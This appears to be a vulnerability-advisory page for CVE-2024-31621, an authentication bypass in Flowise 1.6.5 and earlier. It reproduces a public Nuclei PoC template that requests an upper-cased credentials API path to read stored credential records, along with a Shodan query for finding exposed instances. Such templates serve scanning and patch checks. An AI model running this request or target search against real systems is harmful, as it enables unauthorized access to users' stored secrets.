CVE-2024-31621: Flowise 1.6.5 - Authentication Bypass

日期: 2025-08-01 | 影响软件: Flowise | POC: 已公开

漏洞描述

The flowise version <= 1.6.5 is vulnerable to authentication bypass vulnerability.

PoC代码[已公开]

id: CVE-2024-31621

info:
  name: Flowise 1.6.5 - Authentication Bypass
  author: DhiyaneshDK
  severity: high
  description: |
    The flowise version <= 1.6.5 is vulnerable to authentication bypass vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/52001
    - https://github.com/FlowiseAI/Flowise/releases
    - https://flowiseai.com/
  classification:
    epss-score: 0.80162
    epss-percentile: 0.99064
  metadata:
    verified: true
    max-request: 1
    shodan-query: http.favicon.hash:-2051052918
  tags: cve,cve2024,auth-bypass,flowise,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/API/V1/credentials"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"credentialName":'
          - '"updatedDate":'
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a004730450221008a5a652d352cc04bd259d44d35e94ebd1e3ab90fee3881816ec8aa4d384bf2e302204ad83c8759c1d9f30d6f1186af3ba5a94a4cd11dcf793961ab2cfa84cb964154:922c64590222798bb761d5b6d8e72950

相关漏洞推荐